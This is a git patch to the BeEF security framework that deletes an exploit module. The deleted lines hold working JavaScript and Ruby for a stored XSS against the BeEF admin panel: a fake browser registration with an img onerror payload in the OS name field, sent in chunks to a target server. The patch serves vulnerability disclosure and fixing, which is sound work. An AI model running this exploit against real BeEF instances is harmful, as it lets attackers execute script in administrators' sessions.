From e3a668e2586c9861f1995d4bf19b4ff1821fe409 Mon Sep 17 00:00:00 2001
From: zinduolis <ilgakulnis@gmail.com>
Date: Wed, 25 Feb 2026 15:19:47 +1000
Subject: [PATCH] sanitise PR to have just the fix

---
 .../exploits/beef_admin_panel_xss/command.js  | 168 ------------------
 .../exploits/beef_admin_panel_xss/config.yaml |  15 --
 .../exploits/beef_admin_panel_xss/module.rb   |  17 --
 3 files changed, 200 deletions(-)
 delete mode 100644 modules/exploits/beef_admin_panel_xss/command.js
 delete mode 100644 modules/exploits/beef_admin_panel_xss/config.yaml
 delete mode 100644 modules/exploits/beef_admin_panel_xss/module.rb

diff --git a/modules/exploits/beef_admin_panel_xss/command.js b/modules/exploits/beef_admin_panel_xss/command.js
deleted file mode 100644
index 57bb478cd..000000000
--- a/modules/exploits/beef_admin_panel_xss/command.js
+++ /dev/null
@@ -1,168 +0,0 @@
-//
-// Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
-// Browser Exploitation Framework (BeEF) - https://beefproject.com
-// See the file 'doc/COPYING' for copying permission
-//
-
-beef.execute(function() {
-
-  var target_beef_url = "<%= @target_beef_url.to_s.gsub('"', '\\"') %>";
-  var xss_payload = "<%= @xss_payload.to_s.gsub('\\', '\\\\\\\\').gsub('"', '\\"').gsub("'", "\\\\'") %>";
-
-  // Generate a random session ID (80 characters, uppercase + digits)
-  function generateHookId() {
-    var chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';
-    var result = '';
-    for (var i = 0; i < 80; i++) {
-      result += chars.charAt(Math.floor(Math.random() * chars.length));
-    }
-    return result;
-  }
-
-  // Get current timestamp in milliseconds
-  function ts() {
-    return Date.now();
-  }
-
-  // Split string into chunks
-  function chunkString(str, length) {
-    var chunks = [];
-    for (var i = 0; i < str.length; i += length) {
-      chunks.push(str.substring(i, i + length));
-    }
-    return chunks;
-  }
-
-  // Base64 encode (using browser's btoa)
-  function b64encode(str) {
-    return btoa(str);
-  }
-
-  var HOOK = generateHookId();
-
-  // Build the malicious payload - XSS is injected into host.os.name
-  // Note: the payload is wrapped in the img onerror handler
-  var malicious_os_name = "Linux<img src=x onError=" + xss_payload + ">";
-
-  var browser_data = [{
-    "cid": 0,
-    "results": {
-      "browser.window.cookies": "BEEFHOOK=" + HOOK,
-      "browser.name": "FFAA",
-      "browser.version": "146.0",
-      "browser.engine": "Gecko",
-      "browser.name.reported": "Mozilla/5.0 (X11; Linux x86_64; rv:146.0) Gecko/20100101 Firefox/146.0",
-      "browser.platform": "Linux x86_64",
-      "browser.language": "en-US",
-      "browser.plugins": "PDF Viewer-v.undefined",
-      "browser.window.title": "Unknown",
-      "browser.window.origin": "http://exploited-host:8000",
-      "browser.window.hostname": "exploited-host",
-      "browser.window.hostport": "8000",
-      "browser.window.uri": "http://exploited-host:8000/victim.html",
-      "browser.window.referrer": "http://exploited-host:8000/victim.html",
-      "browser.window.size.width": 1678,
-      "browser.window.size.height": 168,
-      "browser.date.datestamp": "Fri Jan 16 2026 23:34:24 GMT+1000 (Australian Eastern Standard Time)",
-      "host.os.name": malicious_os_name,
-      "host.os.family": "Linux",
-      "host.os.arch": 64,
-      "host.software.defaultbrowser": "Unknown",
-      "hardware.type": "Unknown",
-      "hardware.memory": "unknown",
-      "hardware.gpu": "unknown",
-      "hardware.gpu.vendor": "unknown",
-      "hardware.cpu.arch": "x86_64",
-      "hardware.cpu.cores": 32,
-      "hardware.battery.chargingstatus": "unknown",
-      "hardware.battery.level": "unknown",
-      "hardware.battery.chargingtime": "unknown",
-      "hardware.battery.dischargingtime": "unknown",
-      "hardware.screen.size.width": 5120,
-      "hardware.screen.size.height": 2160,
-      "hardware.screen.colordepth": 24,
-      "hardware.screen.touchenabled": "No",
-      "browser.capabilities.vbscript": "No",
-      "browser.capabilities.flash": "No",
-      "browser.capabilities.silverlight": "No",
-      "browser.capabilities.phonegap": "No",
-      "browser.capabilities.websocket": "Yes",
-      "browser.capabilities.webrtc": "No",
-      "browser.capabilities.webworker": "Yes",
-      "browser.capabilities.webgl": "No",
-      "browser.capabilities.googlegears": "No",
-      "browser.capabilities.activex": "No",
-      "browser.capabilities.quicktime": "No",
-      "browser.capabilities.realplayer": "No",
-      "browser.capabilities.wmp": "No",
-      "browser.capabilities.vlc": "No",
-      "HookSessionID": HOOK
-    },
-    "status": 0,
-    "handler": "/init"
-  }];
-
-  var encoded_data = b64encode(JSON.stringify(browser_data));
-  var chunks = chunkString(encoded_data, 383);
-
-  beef.debug("[BeEF Admin Panel XSS] Sending malicious hook registration to: " + target_beef_url);
-  beef.debug("[BeEF Admin Panel XSS] Generated Hook ID: " + HOOK);
-  beef.debug("[BeEF Admin Panel XSS] Payload chunks: " + chunks.length);
-
-  var requests_sent = 0;
-  var requests_completed = 0;
-  var total_requests = (2 * chunks.length) + 2; // 2 rounds of chunks + hook.js + final dh
-
-  function checkComplete() {
-    if (requests_completed >= total_requests) {
-      beef.net.send("<%= @command_url %>", <%= @command_id %>,
-        "result=Exploit sent successfully. Fake browser registered with Hook ID: " + HOOK +
-        ". XSS will trigger when admin hovers over the browser entry in the Hooked Browsers list.",
-        beef.are.status_success());
-    }
-  }
-
-  // Send chunks for session IDs 1 and 2
-  for (var sid = 1; sid <= 2; sid++) {
-    for (var idx = 0; idx < chunks.length; idx++) {
-      (function(s, i, chunk) {
-        var url = target_beef_url + "/dh?bh=" + HOOK + "&sid=" + s + "&pid=" + (i + 1) + "&pc=" + chunks.length + "&d=" + encodeURIComponent(chunk) + "&_=" + ts();
-        var img = new Image();
-        img.onload = img.onerror = function() {
-          requests_completed++;
-          checkComplete();
-        };
-        img.src = url;
-        requests_sent++;
-      })(sid, idx, chunks[idx]);
-    }
-  }
-
-  // Send hook.js request after a short delay
-  setTimeout(function() {
-    var hookUrl = target_beef_url + "/hook.js?BEEFHOOK=" + HOOK + "&_=" + ts();
-    var img2 = new Image();
-    img2.onload = img2.onerror = function() {
-      requests_completed++;
-      checkComplete();
-    };
-    img2.src = hookUrl;
-    requests_sent++;
-
-    // Send final dh request
-    setTimeout(function() {
-      var finalChunk = chunks[chunks.length - 1] || "";
-      var finalUrl = target_beef_url + "/dh?bh=" + HOOK + "&sid=3&pid=1&pc=1&d=" + encodeURIComponent(finalChunk) + "&_=" + ts();
-      var img3 = new Image();
-      img3.onload = img3.onerror = function() {
-        requests_completed++;
-        checkComplete();
-      };
-      img3.src = finalUrl;
-      requests_sent++;
-    }, 100);
-  }, 500);
-
-  beef.debug("[BeEF Admin Panel XSS] Initiated " + requests_sent + " requests");
-
-});
diff --git a/modules/exploits/beef_admin_panel_xss/config.yaml b/modules/exploits/beef_admin_panel_xss/config.yaml
deleted file mode 100644
index 2b2baaad5..000000000
--- a/modules/exploits/beef_admin_panel_xss/config.yaml
+++ /dev/null
@@ -1,15 +0,0 @@
-#
-# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - https://beefproject.com
-# See the file 'doc/COPYING' for copying permission
-#
-beef:
-    module:
-        beef_admin_panel_xss:
-            enable: true
-            category: "Exploits"
-            name: "BeEF Admin Panel XSS"
-            description: "This module exploits a Stored XSS vulnerability in the BeEF Admin Panel's Hooked Browsers tooltip. It registers a fake hooked browser with a malicious OS name containing JavaScript payload. When the BeEF administrator hovers over the fake browser entry, the XSS payload executes.<br/><br/>This can be used to test if a target BeEF instance is running a vulnerable version."
-            authors: ["author"]
-            target:
-                working: ["ALL"]
diff --git a/modules/exploits/beef_admin_panel_xss/module.rb b/modules/exploits/beef_admin_panel_xss/module.rb
deleted file mode 100644
index f44675c17..000000000
--- a/modules/exploits/beef_admin_panel_xss/module.rb
+++ /dev/null
@@ -1,17 +0,0 @@
-#
-# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - https://beefproject.com
-# See the file 'doc/COPYING' for copying permission
-#
-class Beef_admin_panel_xss < BeEF::Core::Command
-  def self.options
-    [
-      { 'name' => 'target_beef_url', 'ui_label' => 'Target BeEF URL', 'value' => 'http://localhost:3000', 'width' => '300px' },
-      { 'name' => 'xss_payload', 'ui_label' => 'XSS Payload (JavaScript)', 'value' => "alert(String.fromCharCode(88,83,83))", 'width' => '400px' }
-    ]
-  end
-
-  def post_execute
-    save({ 'result' => @datastore['result'] })
-  end
-end